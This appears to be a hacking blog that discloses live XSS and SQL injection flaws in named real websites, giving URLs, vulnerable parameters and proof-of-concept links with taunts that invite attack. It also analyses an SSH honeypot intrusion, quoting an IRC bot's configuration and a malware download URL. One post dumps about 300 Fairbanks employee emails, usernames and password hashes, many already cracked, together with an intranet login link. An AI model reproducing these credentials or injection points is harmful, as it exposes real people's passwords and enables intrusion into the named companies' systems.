RightNow.com XSS Vulnerability

Hi all, just a small update. We have discovered that a dutch company that develops web-based applications, doesn’t like secure coding. In fact, their applications suck so bad that they leave them vulnerable wherever possible.

Unfortunately we can’t disclose every detail due to confidential information involved. Though we can tell you that their website has led us to RightNow.com. Here are the details of this vulnerability, which of course exists in their search form:

URL: http://www.rightnow.com/search/?q=[XSS]

Method: GET

Parameter: q

PoC:

http://bit.ly/uJMR1X

Romanian Botnet server

Hi all, it’s been a while since I’ve posted some stuff. Today I decided to check out my honeypot server and it came to my attention that, against my expectations, there were actually a lot of succesful attempts on my SSH honeypot. This post is not much related to Web-based hacking, but still worthy to post here.

The IP-address that logged in to my machine was 95.247.150.154, which is located in Italy. The hacker first tried to unset the history files. Next he looked at the specifications of my machine. After that he tried to download a PsyBNC archive, located at http://ips.networld.evonet.ro/allbnc.jpg. As of this moment, that file does not exist anymore.

After the attempt was made to download, install and run PsyBNC, the hacker wanted to see how fast the machine was. He tried to download a knoppix ISO file from kernel.org.

Next downloaded another file, located at robcarlos.com/hop.txt (still live at this moment). This file is a perl-based IRC bot, created for portscanning and denial of service attacks. Because it’s perl, a lot of neat information is displayed to us, including the following:

my $hidden = ‘[pdflush]’;
my $linas_max=’4’;
my $sleep=’5’;
my @admins=(“Costi”,”Rege”);
my @hostauth=(“79.117.140.196”,”*!*sweet@*”);
my @channels=(“#*”);
my $nick=’bumfan’;
my $ircname =’double’;
my $realname = ‘Costi the king!’;
my $server=’81.28.97.29’;
my $port=’6667’;

Right, so that tells us the following; their nicknames are Costi and Rege. At least one of them (or it’s a vhost) uses the IP-address 79.117.140.196, which is located in Romania. Then there’s the ident part which shows sweet@*. The bot then joins channel #*.

So about the server, 81.28.97.29, which is located in France, runs the IRCd on port 6667. You would expect botnet herders to be smarter these days and not to use port 6667. Hide it on port 80 or something, jeez..

But that’s not all. Connecting to the server actually reveals something more stupid. It’s like these guys actually want to be found. I got one of their servers’ responses, from the server name, which is “DDoS.SerVeR.Ro”. Really? This obvious?

It’s quite unethical, but tempting, to just go in there, steal their bots and perform a DDoS attack on their own server, using their own bots. But I won’t, not this time :-).

PostCoder.com POST XSS vulnerability

We had a special request to take a quick look at postcoder.com for no important reason. Nothing major was found on this site, they seem to know quite what they’re doing. However, there was one thing that vaguely appeared but still caught our attention. It’s a Cross-Site Scripting (XSS) vulnerability that works through the POST method. We haven’t reported much about these because most of the XSS vulnerabilities occur through a GET method. So here are the details and a PoC button:

URL: http://www.postcoder.com/handy_tools/postcode_lookup/postcoder_pro_demo

Method: POST

Parameter: enterSearch

PoC: http://pastehtml.com/view/bac4n4h81.html

hsx.com Multiple Vulnerabilities

@hsxmovies is trusted by TRUSTe, but for how long? Their site suffers from multiple security vulnerabilities. According to Wikipedia, HSX, or Hollywood Stock Exchange is a web-based, multiplayer game. The image below should illustrate perfectly what’s going on here.

image

Here’s a screenshot that would perfectly back the previous statement up:

image

Game or not, websites have vulnerabilities. The HSX website is graphically neat, but coding wise it’s a hell. Multiple vulnerabilities on their website, including SQL Injections (SQLi) and Cross-Site Scripting (XSS).

Because we do not care about a gaming website, we decided not to dig too much in their database but just show some general information about it:

Their webserver is running Linux, CentOS 5. Could’ve gone to Micro$oft aswel… Apache version 2.2.3 and PHP version 5.1.6, well, alright then. MySQL is running version 5.0.11.

If you want to go after it, we won’t stop you, as they left everything open for ya. Here are the databases that exist on their system:

available databases [3]:
[*] information_schema
[*] nx
[*] test

The database which is used for the website is nx.

So usually you would say, I bet it’s just one page that’s vulnerable. How about: no. So far we have discovered at least 4 pages that contain vulnerabilities. Let’s start off with the SQL Injection vulnerabilities:

URL: http://www.hsx.com/search/?action=submit_nav&keyword=[XSS]
Method: GET
Parameter: keyword
PoC: http://bit.ly/ptpD8A

image

Special thanks to hsx.com for providing us with a perfect illustration of vulnerabilities that shouldn’t even exist on a website like theirs.

Enjoy this one. We’re on to the next!

DSV-Saaten.de XSS Vulnerability

DSV-Saaten, a company based in Germany also decided Cross-Site Scripting (XSS) vulnerabilities are no big deal to them. Here are the details:

URL: http://www.dsv-saaten.de/suchergebnis.html?query=[XSS]

Method: GET

Parameter: query

PoC:

http://bit.ly/oEL1rD

Floriade.nl XSS Vulnerability

HELLO @floriade_2021 , no worries, we are from the internet. Here to inform you about your STUPIDITY when it comes to websites. Yet another site that allows Cross-Site Scripting (XSS) in order to make the site even prettier. Here are some details:

URL: http://www.floriade.nl/zoeken?search=[XSS]

Method: GET

Parameter: search

PoC:

http://bit.ly/pIQQAN

Fairbanks.com SQL Injection Vulnerability

Hi everyone. We’re back from the death and it’s that time of the day again. Yet another website developed by people that did not have enough skills to close security leaks.

This time it’s fairbanks.com. Here are some details:

URL:http://www.fairbanks.com/products.asp?id=[SQLi]

Method: GET

Parameter: id

Some output has lead us to some details that allow you to get access to their Intranet. You can log in here:

http://intranet.fairbanks.com/login/site_login.cfm

And last but not least, here is the output of their account list, some are already cracked:

user_email,user_password,user_username
shogge@fairbanks.com,4D06EC56430DB80EDBFDDDE36CA5F126 (altair),shogge
dmashaney@fairbanks.com,65A0C8A4546B886B28031CAE54B2629F,dmashaney
pharris@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),pharris
rdesilets@fairbanks.com,81753C78A1EBAB577979669E3495F1E4,rdesilets
esoto@fairbanks.com,4d06ec56430db80edbfddde36ca5f126 (altair),esoto
lsteffens@fairbanks.com,7b46e4bb774f669a920c664e39d26db5 (jlg),lsteffens
jehrnschwender@fairbanks.com,9b4e21b488eac351cb544b8ee022e785 (Kangaroo),jehrnschwender
saltlakecity@fairbanks.com,8928e97efcd7001715088daeee6a6005,sboynton
ljarreau@fairbanks.com,c0429b6a658dd488f7262d983c7e02bb (Snowball),ljarreau
rmurry@fairbanks.com,e298629e33941ebaf178b0e5e00eca70,RMURRY
koliver@fairbanks.com,3f73640ebbaa56c46fa49ee234316fd6,koliver
sdunford@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),sdunford
cgroth@fairbanks.com,B5E97292F3B4F350E79F8EDBA2C56C89,cgroth
jroyle@fairbanks.com,349d789f5d11f630c282f547b568d08d,jroyle
mmanheim@fairbanks.com,20F46557DACE2132E6FE939596BBFC66 (checks),mmanheim
dmashaney@fairbanks.com,192F83A7C6387707281D806163BE8F27,dmashaney
dstory@fairbanks.com,11b89d80e7587a6d844741c1020dda99,dstory
gchristiansen@fairbanks.com,3e320effdadd40d4462761e13ce378d1,gchristiansen
dlynch@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,dlynch
lmerkley@fairbanks.com,9605451b84c2e38a07f592f6136bbb98 (Corvette),lmerkley
mfail@fairbanks.com,1F8A54D4FBD89E974F92C591DFB552D8,mfail
glopez@fairbanks.com,2d618170af5ef5a8ce9d202e412ae8b2,glopez
goliver@fairbanks.com,0EE4B3A4DB1ACCB433DF2A5E86571F8E,goliver
thardaway@fairbanks.com,2166e6bd357a4e9dced839be581318c6,thardaway
rburnett@fairbanks.com,e4705b1db692efb4df263ad4bc397c52 (farside12),rburnett
jmccormick@fairbanks.com,B411F35BAF7F470F31C95851BA4C381F,jmccormick
rjohnston@fairbanks.com,0EE4B3A4DB1ACCB433DF2A5E86571F8E,rjohnston
bcornett@fairbanks.com,3bd1a8dd8bc38c1f981c71996c2d7fba,bcornett
ltamrowski@fairbanks.com,B81A8513254A2F643BFF375BB82C3738 (oscar9),ltamrowski
jcerrone@fairbanks.com,A106E5078F80FF75B7EF95ED214E833F,jcerrone
lvictory@fairbanks.com,1d7169626478378abbe900548c5fd81a,lvictory
gpowell@fairbanks.com,209728F481AB5298C81C27D664675C96,gpowell
charlotte@fairbanks.com,C9CDCB06301F9C79E2D20C2FDEDA0A02 (changeme123),Charlotte
aschnoor@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),aschnoor
apappadopoulos@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),apappadopoulos
dliban@fairbanks.com,88DBA5AC4686701ED2EA73D6C1851D3C,dliban
bgrasmick@fairbanks.com,2841d02a7dac6b874715f28efdb45d3a,bgrasmick
rteal@fairbanks.com,0d107d09f5bbe40cade3de5c71e9e9b7 (letmein),rteal
dvictory@fairbanks.com,2bbe0fb202e0cd775bf3ee8b3e0847c4,dvictory
mfraley@fairbanks.com,3250320dcaf3b60f1417b7b37986c4a3 (titan),mfraley
mcheek@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),mcheek
memphis@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),mhines
myoung2-closed@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,myoung2
dbishop@fairbanks.com,f4676266e7546a8c878ce0a4824b3e94 (batboy),dbishop
dwright-closed@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,dwright
scolvin@fairbanks.com,56094916cffdddfbdcb77c1f8f4cb68f,scolvin
mmech@fairbanks.com,3EB9A90F2884E8C4CB7B77FE4D3F982B,mmech
dehrnschwender@fairbanks.com,DDC2D32FBD7A70768477030746024BBA,dehrnschwender
rhouse@fairbanks.com,8e77db609e8f81c41cb2bd8166f74456,rhouse
dgreen@fairbanks.com,2D5951D1E3B31DFB7FD2DCC172DF17FD (6164),dgreen
ljones@fairbanks.com,7275566bdf1912007754dad5596cc00b,ljones
dparson@fairbanks.com,574A6048BE47AFD67356ABCBF960CFB8,dparson
Houston@fairbanks.com,B3E36C548CB8EE25971AE534ED15A6DE (Sharon),sgough
pseymour@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),pseymour
atlanta@fairbanks.com,860e092f441bdc662e6d2d8379b87dae,wraner
rdibucci@fairbanks.com,38fce53866811332532b5df66f8fdb1e,rdibucci
detroit@fairbanks.com,d636a3270901987d3618867c91170916,mlegg
smodzel@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,smodzel
avining@fairbanks.com,DF9253C1BFE775F481B1AB3C44301260,avining
rherman@fairbanks.com,5a5079916272adbda4f791b386561182,rherman
jrivas@fairbanks.com,fe6fffe3edd3f566d0773afe07950fce,jrivas
jedwards@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,jedwards
losangeles@fairbanks.com,c7fcf73e48d07b12bb2e6b2c4a509d07,lvandenheuvel
losangeles2@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),mcrater
shayne@fairbanks.com,8166f93d4ae87fd9ac7c83b332ccc9ab,shayne
rhansen@fairbanks.com,e1114432a2ac994a333544d5da17e1fb (Halloween),rhansen
ddixon@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,ddixon
pdouglas@fairbanks.com,f058b1b2a285e99e562b393dd12fc429,pdouglas
BWRIGHT@fairbanks.com,a6abbd7820f31c2bf6385c686b24c068,bwright
rblackwelder-closed@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),rblackwelder
Whopkins@fairbanks.com,f8dec159a98ec98b003c189ac6640bc8,Whopkins
mlening@fairbanks.com,f5974b3a0ea2460ce44cb6ac8d5758a8,mlening
pgortzig@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),pgortzig
pittsburgh@fairbanks.com,1147dc16a8e1b44eead07282cad093f8 (9283),KHampe
Boston@fairbanks.com,73ac9896b3f22bf0307b19130810e5e5 (kaitlyn),dburr
Dallas@fairbanks.com,26b140a4583855f5d5b6e945e9a954f2,Dallas
norleans@fairbanks.com,561D94FD4C542E7F5ED8BCCCD08AED1F,neworleans
rslaybaugh@fairbanks.com,47f59b5e0fae379effe0662488b4810e,rslaybaugh
dmoss@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,dmoss
baltimore@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),rlessner
aalferi@fairbanks.com,FDFA02ECF86FEAC3801254DA57C1C9BA (smoke),aalferi
rhudson@fairbanks.com,3c1aac82863ed9e5a9aca8ce687f711d,rhudson
kparchert@fairbanks.com,222B2B0714EF354B19506F7A08065DF9,kparchert
srockey@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,srockey
ttobel@fairbanks.com,1a51d1bb7ddd02a7862f599cd0ecd285 (Walleye),ttobel
rselby@fairbanks.com,23007760f7a527e27b7efca11cf9c2cc (Sandra1),rselby
rspraberry@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),rspraberry
bclithero-inactive@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),bclithero
hdaigle@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),hdaigle
bpester@fairbanks.com,3f370e4e0c59b577aee24aed37e101ee,bpester
rramon@fairbanks.com,1dbb36285f8dd70721b245b98fbaf4f4 (selena),rramon
nferrick@fairbanks.com,19581D9A0A4DEAC41CB2D0588C8A9C2B,nferrick
pfoster@fairbanks.com,0daaf4a9abe3920c453a7f1f82a9bb19 (Iowa),pfoster
lhodges@fairbanks.com,860e092f441bdc662e6d2d8379b87dae,lhodges
dmoore2@fairbanks.com,4B088AAA68446B6EC08CDC385D03516D (Defense),drutledge
lmoses@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,lmoses
akeeven@fairbanks.com,b7e5a569518d067860ad32aefc8cb20f,akeeven
bpomajzl@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,bpomajzl
kbailey@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),kbailey
gpowell@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),gpowell
gcooke@fairbanks.com,C02034B9AC66768F11B014C68562CDCC,gcooke
thope@fairbanks.com,AB5C519076874D95B1B6D321EFBEB2E4,thope
djehrnschwender@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),djehrnschwender
bbennett@fairbanks.com,6C5B90CEA858312B4A7F070448F8CD1F (Ferrari),bbennett
mmashaney@fairbanks.com,27792947ed5d5da7c0d1f43327ed9dab (details),mmashaney
boveson@fairbanks.com,7639BB1707DF8B67AAF212BFBB4F8FCA,boveson
gmckillup-closed@fairbanks.com,55F85652DBD986D4CFB2A8ED853862A4,gary
rhatt@fairbanks.com,77D4586A8221D5BAEAB2583F0A02EC58,rhatt
ngenova@fairbanks.com,86b627c1607e7c5fbfb2e19132dacc5d,ngenova
Stpaul@fairbanks.com,1bb593b11cd2141c0c6ba9a841180751,Pschumacher
jbatson@fairbanks.com,0CEFC788400A9449BCCF02DDBC5DDAC8,jbatson
wmages@fairbanks.com,b3b32a2d422265cd25c3323ed0157f81 (pages),wmages
cmiller@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,cmiller
jmychaluk@fairbanks.com,A76E3838A4FAA9309A04B0E5D406F086,jmychaluk
rhatt@fairbanks.com,270A0E1BF11A939C8D2ECA36F5286B24,rhatt
ematallana@fairbanks.com,e252a5167841b3d3a28e9030615964fa (tango),ematallana
Chicago@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),Chicago
jskidgel@fairbanks.com,C2E8E9388C71AF50635B4896FFB99294,jskidgel
rprice@fairbanks.com,8E6083F31148D55085F0D4394ADA2C1A,rprice
zcline@fairbanks.com,3e0fd1ad8efb39d90b8cd3b04a6c94f1 (r2d2),zcline
ccoldwell@fairbanks.com,1b72746255ef01f9d75400995c62ea12 (6563),ccoldwell
mbraaten@fairbanks.com,52a0f6f488fa6e794212f19cefdcaec5,mbraaten
kansascity@fairbanks.com,9F9D51BC70EF21CA5C14F307980A29D8 (bob),kansascity
neworleans@fairbanks.com,4cef172693bab7d1945c3ebd7ea21d16,lostarly
mstapay@fairbanks.com,7367b22e19fb8c48dc46281abd2875d8,mstapay
epotutschnig@fairbanks.com,4A92FBE41F6463598C39850B8335096C,epotutschnig
djames@fairbanks.com,858963014279696926a05dcfe822b2d9,djames
pmills@fairbanks.com,A991B360DD5D12E0C3B7D86F71691B10,pmills
dkunkle@fairbanks.com,6814a9d9bb0f943f55ce4ed71fc0481a (nikki),dkunkle
dkent@fairbanks.com,564f10260067a9b0c8d8e206ecdb49c6 (kent),dkent
awilliams@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),awilliams
gtilander@fairbanks.com,0BB851AD82B7EF6594148B165DD74220,gtilander
jwilinski@fairbanks.com,68c3831d0d5664c755bfb905084d3d28 (Wingman),jwilinski
cwade@fairbanks.com,69DF7109898F11C9EAA77C615A122B73,cwade
jfay@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),jfay
droach@fairbanks.com,354bc587e42375694400d96c84c37174,droach
cgutierrez@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),cgutierrez
bsadowski@fairbanks.com,1CBD7DE36A1C96AEE44972F058E28C5B,bsadowski
phoenix@fairbanks.com,33da7a40473c1637f1a2e142f4925194 (popcorn),phoenix
gcaldwell@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,gcaldwell
rmccullough@fairbanks.com,25e014b0d9a2a1a3bc38eaa08efd6ac3,rmccullough
tcannon@fairbanks.com,D4019EFE3C4CBD7133C6CDCF61B909EC,tcannon
jtilander@fairbanks.com,13cbcafc683e1f2a2d037dddea2935f1,JTilander
vHarvell@fairbanks.com,915a71ec8a70ab6283aa814dae26b881 (110756),vharvell
dcress@fairbanks.com,2907a7ee047144e684ee5edcc5f123f7,dcress
kwade@fairbanks.com,21ace1130e0e1b28db8a5f5b0adc0da0,kwade
jobrien@fairbanks.com,2f8e0187d795c86ce7a7413a83944dae,jobrien
pjung@fairbanks.com,56ab24c15b72a457069c5ea42fcfc640 (happy),pjung
ereitenour@fairbanks.com,50fc2e4d2c4329c74a95548623b46458,ereitenour
mortega@fairbanks.com,6238cb036a4229f33c2aac007631f50a (anamaria),MOrtega
dramirez-closed@fairbanks.com,270A0E1BF11A939C8D2ECA36F5286B24,dramirez
cgroth@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),anne&chris
Jmoore@fairbanks.com,859e00b3f78bddd5452dd5f4b5c869ba (Firebird),jmoore
bmccann@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),bmccann
jbarber@fairbanks.com,9213f3eebf9e94409d89ea1d4b95d0e1,jbarber
lwilson@fairbanks.com,edfee24a2052c3d3f6da213d84b59c7e,lwilson
nBenavidez@fairbanks.com,a8040d44d338c8fd1028a0744b1861ce,nbenavidez
apotutschnig@fairbanks.com,EAF028D8B8072D4F4B4D17A2760CC309,apotutschnig
pfraniuk@fairbanks.com,347C4C6569008C8276A82CB61FD8EB3F (Megahertz),pfraniuk
calbert@fairbanks.com,b6417f112bd27848533e54885b66c288 (8113),calbert
saddison@fairbanks.com,ED0A707E490192B3288213AC3C1AA33D,saddison
gpelletier@fairbanks.com,2513604888d413b38a0850e551eb9a9d,gpelletier
jobrien2 - inactive@fairbanks.com,0456C733E8F4D1A8F1FD2D02815E91AF,jobrien2
rhoman@fairbanks.com,d99ff19e6e035e7262be2188d0fb4b99,RHoman
jlehnherr@fairbanks.com,33b6009fdeb9cdeb5e1954b941fc7f4d (Goodyear),jlehnherr
ruhlenkott@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),ruhlenkott
sjameson@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,sjameson
atlanta@fairbanks.com,860e092f441bdc662e6d2d8379b87dae,AShop
mconway@fairbanks.com,918869970F24CAE5E99522FE6A814594,mconway
jrodgers@fairbanks.com,5927394ea5c7e8451c52b39dbb6f9629,JRodgers
mhopper@fairbanks.com,50a845522f8600765b20e9db8f7c78d2 (Michelin),MHopper
tsanders@fairbanks.com,c1e9e199a440dd219302829ea293950f,TSanders
ttraining@fairbanks.com,27CB6A9C075369D09F4A30B8996EC6C3 (Pilot),atech
imaisch@fairbanks.com,6243E1116E9DE008E4DCF0AA2700CA89 (tucker),imaisch
rcuyler@fairbanks.com,1592104031CEAA405B8A103C399E2633 (7682),rcuyler
rtate@fairbanks.com,5726daf2c9ee0f955eca58291c26d2f3 (6712),RTate
pnelson@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),pnelson
daustin@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),DAustin
wewing@fairbanks.com,334040976e6022cae5f3e89388f8fba8,wewing
jgray@fairbanks.com,f5bdd2400b1b529d49e35f3886656793 (Ingersoll),JGray
bcroissant@fairbanks.com,fc5f7d69b646ed95835badc0fc23bc11,BCroissant
lwarner@fairbanks.com,71f76d30fae4bd35087d25694b18a702 (Polaris),LWarner
jgeorge@fairbanks.com,c5302eb8fb01c582729567fe9e94abf2,jgeorge
theim@fairbanks.com,16c1d40c782aec3237dc9283ae626715,THeim
gfloyd@fairbanks.com,03CA6B934FA459B20638E82BC7EE839A,gfloyd
baltimore@fairbanks.com,b5e97292f3b4f350e79f8edba2c56c89,KWittler
jumsted@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,jumsted
pjames@fairbanks.com,c7b1461129993520e94bf70d2f8ef63e,pjames
pcutter@fairbanks.com,21E86165ED8D0C319698063C54263900,pcutter
twilcox@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),twilcox
mtancibok@fairbanks.com,56c97903eddc9534396c7249d2e5aa1f (ridge),mtancibok
jshorten@fairbanks.com,ba41903d01ed39b1b98768512c8e65f5,JShorten
arangel@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),arangel
ebergstrom@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),EBergstrom
jolmos@fairbanks.com,AD185A320A9C8AF2E25D53EF7CBACD4F,jolmos
ashoemaker@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),AShoemaker
lespinoza@fairbanks.com,138a0a4537c6d159a4699f2e2050f880,lespinoza
amorrison@fairbanks.com,1BB1D671EB35FCE4FB7AC9302804D2F8,amorrison
bschafer@fairbanks.com,88a63af7a474071b764fb981f8515bd4,BSchafer
ltaylor@fairbanks.com,32abc4780cd4edd4bb177e688e44444a,LTaylor
mbradley@fairbanks.com,2bf21ec8d84984a9b7fc82cb92c3293a,MBradley
rreid@fairbanks.com,3fd1e7bcb5bdbcbab8137710118e3117,RReid
cpotter@fairbanks.com,6a765cb23ced7d96e6f61a0140dcd108,CPotter
omaha@fairbanks.com,3638e370cdfce7dca70e03e87530de70 (plumb),MMcClusky
davenport@fairbanks.com,eaf450085c15c3b880c66d0b78f2c041 (linda),lkane
cmarsh@fairbanks.com,E4EF249EDD7B2A29DC255B5B02BCD535,cmarsh
jpomajzl@fairbanks.com,25846390e992844b829d7080af56d4ba,jpomajzl
sshiver@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),sshiver
plugo@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,plugo
gjones@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,gjones
jhayes@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),jhayes
ralexander@fairbanks.com,15C2D85F1FAE22A3C3A0594510A1F611,ralexander
drosenbeck-closed@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),drosenbeck
ezimmerman - inactive@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),ezimmerman
tcastro@fairbanks.com,ffe6499b2264daeeb1863aabb8573661,TCastro
rcorrea@fairbanks.com,A69F52612BF2ED2E9E8BE17ED45996F7,rcorrea
rboepple@fairbanks.com,f9e019f3950abb2f99614c782ebf8279,RBoepple
wwingfield@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),wwingfield
lhager@fairbanks.com,19BDE636CD8B4F87DCF974B190EB2E56,lhager
jkoty@fairbanks.com,7576182d0a84b1ba2207f8f061d48bc9 (7588),jkoty
cputmon@fairbanks.com,F5FAD6D3C9E598F4F7426C658AF0551A,rdesilets
ecurry@fairbanks.com,EC6A6536CA304EDF844D1D248A4F08DC,ecurry
rmoore@fairbanks.com,48B79545745115872AE0BE9F0B8689F1,RMoore
dsullins@fairbanks.com,de8504b73ea228d0ea9bbce69752092e,DSullins
mlinton@fairbanks.com,900eca67ecb4506a06a9d784a85da475,MLinton
daldridge@fairbanks.com,8332c2eeae64620fa7b71cfb04fad560 (dogwood),DAldridge
rupton@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),rdesilets
ccordero@fairbanks.com,02f88c3356ac83cf7cd1b57a59780161,CCordero
Rrodriquez@fairbanks.com,16a11e8b72f2bf2d786c19e98b473367,RRodriquez
kscargall@fairbanks.com,37FF11EB62EB8F92F04D62399B90D796,kscargall
Kgoward2@fairbanks.com,adbacf703347268cd6355570cdd665f8,KGoward2
bcress@fairbanks.com,0f0ee3310223fe38a989b2c818709393 (6418),BCress
Kgoward@fairbanks.com,450e92aa762ce31e6f6f5e4402facc73 (9934),KGoward
amurphy@fairbanks.com,187f8792898242ddb0185d0b28d259ba (jody10),AMurphy
ewhitford@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,ewhitford
jjohnson@fairbanks.com,81b6f7caffc8444c7b38bcb1d332c708,JJohnson
tgrotzinger@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),tgrotzinger
scaleman@fairbanks.com,931e0f226b5985f47497229dd2487491 (erlinda),EKane
kfuller@fairbanks.com,00C99681B5913DCF46F6F4DBE040BD27,kfuller
jfletcher@fairbanks.com,4BAA9A095E8155307637A13E3C608E0E (kelly135),jfletcher
gwinkler@fairbanks.com,28f719c89ef7f33ce2e178490676b5ab (Andrea),GWinkler
tburkett@fairbanks.com,a27a44054389922d45f09f048d132926 (bearing),tburkett
schecchio@fairbanks.com,5230e64992af2258ef3ca3db4c07f58f,SChecchio
jdelpriore@fairbanks.com,e42b5268254c28407be697af6a157706,jdelpriore
sjordan@fairbanks.com,44FADEC4B16C98E59403482FFC18A057,sjordan
scondos@fairbanks.com,9C1B9134F82D0415239FE9F6C034E5DF,scondos
mmorales@fairbanks.com,807b1650bfac25514083a583a96ee496,mmorales
twallace@fairbanks.com,9844c743d89e524fef866d2b15615f7d (4runner),twallace
mniendorf@fairbanks.com,8e7bb02b763a2e07d30b4ab24beb7fa1 (scales),MNiendorf
mmcgraw@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),mmcgraw
dhamill@fairbanks.com,074afeda56fb27564aeb1315be28036b,DHamill
cclark2-closed acct@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),cclark2
aotterstetter@fairbanks.com,fbc973d56bee0153f59e863b1d77dc04,aotterstetter
lgrant@fairbanks.com,423952326A1E08E7682AEC7A75083E4B (barrows),lgrant
sacramento@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),mbradshay
dSweeney@fairbanks.com,fea34faaf53e4ab4925b8a9e7765bbd4 (tackle),DSweeney
dmccabe@fairbanks.com,85fbbf10f6f2a1c1a88b43c0d8052505,dmccabe
fspencer@fairbanks.com,f05a4b6501af38dc9f6cb7ed886fd0dd (dallas12),FSpencer
kbarbor@fairbanks.com,7f3d81afcac800334f650090bd23b1e6 (Yamaha),kbarbor
wchandler@fairbanks.com,0324ae3e6eb1efd3eb7293d11a002ecd,wchandler
rshultz@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),rshultz
dwinters@fairbanks.com,c8db878698991813d0983d4ddd604470,dwinters
rallen@fairbanks.com,31c9b5f336235937f9febeda83979a78,RAllen
bober@fairbanks.com,77b7c49f0863f5e281508ff8af9e68dd,BOber
dgay@fairbanks.com,a9744fc5b0ca952b17ef07c0aa99602e,DGay
dmcclaskey@fairbanks.com,20E87A4D0C6E573ADDE6D25600F4EAF5,dmcclaskey
agelineau@fairbanks.com,332e3c4d6a5e42e0078a388219fb54a7,AGelineau
lviolette@fairbanks.com,f48ec0108666d39849a87dcb978b3591,lviolette
jobrien2@fairbanks.com,32D68A79027F3090DA2BC72D89124187 (edina),jobrien2
dhill@fairbanks.com,8956E23DD8604569B9A1193AD85DE763,dhill
jrodarte@fairbanks.com,13D9173FD8C031B139BE36976E39614A (ditto),JRodarte
jjohnston@fairbanks.com,E69388DFC01A1399135095C284EE5370 (monkey06),jjohnston
rmelton@fairbanks.com,77048D716B76E611D018DF757CBCD416,rmelton
lschumacher@fairbanks.com,B2C31F1087B408A573DF76BC50B8B534,lschumacher
lgalatas@fairbanks.com,21b3fc7872443174690828cdd0ddb49b,LGalatas
kradke@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),kradke
rsipes@fairbanks.com,053d8270d876991e7b06cd31e3a94f21,RSipes
jrolewicz@fairbanks.com,1858c5c9fdc785b9fa2d901be1111971,JRolewicz
rrouse@fairbanks.com,9ba52993f150e9ead03e981fda13a946,RRouse
philadelphia@fairbanks.com,c9cdcb06301f9c79e2d20c2fdeda0a02 (changeme123),DColeman
etorres@fairbanks.com,59ef1e3b349bc83c8a34356d02407bc5,etorres
rober@fairbanks.com,140E1DCB9226EF6DB908D8621EF1F8C8,rober
slarson@fairbanks.com,b570e354b7ebc40e20029fcc7a15e5a7,slarson
mwebb@fairbanks.com,49523add5e04bc0e7aad5dc5cdfc2be0,mwebb
cniichel@fairbanks.com,03fedd2f9609e6259c22d0e6d37c28f2,cniichel
tbartlett@fairbanks.com,954e18b00c4a9fd6aa651db3a31a2c43,TBartlett
telsbury@fairbanks.com,72ae8dc7f3f3ad53bf645d46dc4fca83,TElsbury
sbailey@fairbanks.com,c68ce582b294cd46b9099351ef9b348c (washere),sbailey
jwilliams-closed@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,jwilliams
jshamy@fairbanks.com,F5FAD6D3C9E598F4F7426C658AF0551A,rdesilets
tfluegge@fairbanks.com,223A21A183BA0D2CADCD7CD49AA33171,tfluegge
